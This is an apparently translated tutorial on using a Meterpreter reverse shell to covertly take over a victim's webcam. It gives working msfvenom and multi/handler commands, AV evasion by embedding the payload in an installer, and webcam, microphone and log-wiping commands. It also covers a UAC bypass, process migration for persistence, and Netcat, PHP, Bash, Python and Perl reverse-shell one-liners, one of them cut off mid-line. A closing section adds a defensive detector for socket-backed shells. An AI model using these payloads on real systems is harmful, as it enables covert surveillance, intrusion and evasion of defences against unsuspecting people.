2025-03-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/02 Report--
This article explains how a reverse shell can be used to take control of a webcam. The editor considers it quite practical and shares it here for reference. Let's take a look.
If you've taped over your webcam, you've probably heard that hackers or the NSA can spy on you remotely. So the question is: how do people you've never met connect to your machine and watch you?
One possibility is that you exposed your CCTV or IP cameras publicly on the Internet and attackers found them on sites like Shodan. Combined with the fact that you never changed the default passwords, that is all it takes for an attacker to take control of the camera and watch your every move.
These are the most common security issues with IoT cameras. If it is a built-in webcam, however, the more likely explanation is that an attacker compromised the machine with a Meterpreter payload and took control of it. With Meterpreter an attacker obtains a reverse shell, which is what this article is about. For more information on Meterpreter, see: www.offensive-security.com/metasploit-unleashed/about-meterpreter/
You may wonder why an attacker would not access your machine directly rather than through a reverse shell. The reason is simple: direct access is likely to be blocked. Inbound traffic is far more likely to be filtered than outbound traffic. If instead the target machine initiates the connection to us, its firewall is much more likely to let the traffic through, because from its point of view the target itself wants to talk to our machine.
msfvenom is the tool we will use to build the reverse shell payload. It is pre-installed on Parrot and Kali. First, let's run the following command to create the Meterpreter reverse TCP shell payload:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe
Once created, let's upload it... blocked. This is because the Meterpreter payload has a reputation: it is already signatured by most security products, so they detect it and block or quarantine it.
We can try a tool called Shellter to change the payload's hash and embed the reverse shell in another file. We chose to embed the shell in an installer because most installers need to be run as an administrator, and as you'll see later, running the exploit as an administrator saves us a lot of trouble.
You can launch Shellter directly; it is also pre-installed on Parrot and Kali.
Let's use Auto [A] and locate the executable I created for this example.
Next, we select the reverse TCP shell and enter the IP and port of our machine (attacker). When done, it embeds the shell into the exe file of your choice so you can upload it to the target machine. Now you need a way to put it on the target machine, but for this example I'll copy and paste.
Even though we hid the Meterpreter shell inside the installer, AV still detected it. For the sake of this demonstration I'll simply turn AV off, because I can. In a real-world scenario an attacker cannot be this casual: they would have to disable or blind AV by technical means, or build a payload that the target's AV does not detect, before dropping it.
Now, let's run it.
Before we get started, let's load msfconsole (Metasploit) on the attacker and run the following command:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.X.X
set LPORT 4444
run
Your handler will now listen on the IP and port specified in the reverse shell payload. Let's run the exploit as a normal user:
As you can see on the right, several of our attempts to set up a session failed. This is why I said earlier that the payload should run as an administrator: then all the scripts and DLLs can be run and injected without trouble. When the user runs it as an administrator you will not see any failures, as follows:
Having successfully obtained the reverse shell, we are now ready to perform the desired action on the target machine. If your target is a camera, you can do the following:
Show webcams: webcam_list
Webcam snap help: webcam_snap -h
Take a picture without opening the image afterwards: webcam_snap -i 1 -v false
Record audio: record_mic
Record webcam: run webcam -p /var/www/
Stop recording: run webcam -s
It's not just webcams; there are many other commands you can execute. Example, clear all logs (application, system and security logs): clearev
This is just one example, and it is unlikely that hackers will run it. Because doing so would alert the administrator. If you find that all logs have been erased from a machine, you can assume that someone has already used it. Instead, attackers are more likely to delete selected events to cover their tracks.
All of this requires administrator privileges, and your user may not be able to run it elevated. In that case you can use a UAC bypass module such as bypassuac_comhijack. First, you still need a normal user-level reverse shell.
Once you have the shell, type background and press Enter to move the current session to the background. You can then run the bypassuac_comhijack exploit against that session, as follows:
You can then go back to the original session and run the following command:
After successful execution, you will get an admin shell. To keep a long-term, stable backdoor connection to the target machine, we need to hide our reverse shell in a more covert and stable process (rather than a PuTTY exe or an installer), because as soon as such an app is closed our connection is lost. That is why we migrate the reverse shell as soon as possible into a process that runs continuously.
First, let's look at what processes are running.
After finding a relatively stable process, run migrate [PID].
This migrates your Meterpreter session into that process, so your session survives even if the exploited app is closed.
As you can see, Meterpreter is very powerful, but it is not the only way to get a reverse shell. You can also use Netcat; a VirusTotal scan shows that, unlike Meterpreter, some AV vendors do not flag it as a threat.
You can find Netcat on Parrot or Kali under /usr/share/windows-binaries/nc.exe. After uploading nc.exe to the target machine, run nc.exe [Attacker IP] [Port] -e cmd.exe.
On the attacker machine we need to listen for the connection, which is done by running nc -lvp [Chosen port].
You'll get a simple reverse shell with normal user rights, which is a good start. From there you can work on escalating to administrator privileges. Here are some more examples of reverse shell one-liners:
PHP
php -r '$sock=fsockopen("192.168.0.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Bash
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
Netcat Linux
nc 192.168.0.10 1234 -e /bin/sh
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="192.168.0.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))){open(STDIN,">&S");open(STDOUT,
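Every one-liner above does the same thing: connect a socket, dup2() it onto file descriptors 0, 1 and 2, and exec an interactive shell. That leaves a fingerprint a defender can look for. The following detector is an added example (not from the original article); it assumes the Linux /proc layout, where /proc/<pid>/fd/N links to "socket:[inode]" for a socket, and it flags any known shell whose stdin, stdout and stderr are all sockets. The sample snapshot is constructed so the script runs offline.

```python
import os

# Interactive shells worth flagging when their stdio is a network socket.
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}


def is_shell(cmdline):
    """True if argv[0] (path stripped) is a known shell."""
    return bool(cmdline) and os.path.basename(cmdline[0]) in SHELLS


def socket_backed_stdio(fds):
    """True when fds 0, 1 and 2 all link to "socket:[inode]": the fingerprint
    left by dup2(sock, 0/1/2) followed by exec of a shell, as in the one-liners."""
    return all(fds.get(n, "").startswith("socket:[") for n in (0, 1, 2))


def find_suspects(snapshot):
    """snapshot: {pid: {"cmdline": argv list, "fds": {fd: link target}}}.
    Returns the pids running a shell whose stdio is socket-backed."""
    return sorted(pid for pid, p in snapshot.items()
                  if is_shell(p["cmdline"]) and socket_backed_stdio(p["fds"]))


def snapshot_from_proc(proc="/proc"):
    """Build the same structure from a live Linux /proc; processes that exit
    mid-scan or deny access (root is needed to see other users' fds) are skipped."""
    snap = {}
    for name in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{name}/cmdline", "rb") as fh:
                argv = [a.decode(errors="replace")
                        for a in fh.read().split(b"\0") if a]
            fd_dir = f"{proc}/{name}/fd"
            fds = {int(n): os.readlink(f"{fd_dir}/{n}") for n in os.listdir(fd_dir)}
        except OSError:
            continue
        snap[int(name)] = {"cmdline": argv, "fds": fds}
    return snap


# Constructed sample snapshot: 4242 mirrors the one-liners above, 1000 is a
# normal terminal shell, 77 is a daemon that owns a socket but not on stdio.
SAMPLE = {
    4242: {"cmdline": ["/bin/sh", "-i"], "fds": {n: "socket:[51234]" for n in range(4)}},
    1000: {"cmdline": ["bash"],
           "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    77: {"cmdline": ["/usr/sbin/sshd", "-D"],
         "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[999]"}},
}

if __name__ == "__main__":
    print("suspect pids:", find_suspects(SAMPLE))  # [4242]
```

On a live host, find_suspects(snapshot_from_proc()) run as root gives the same check over real processes; a legitimate hit would be rare, since normal shells sit on a pty or pipe, not a socket.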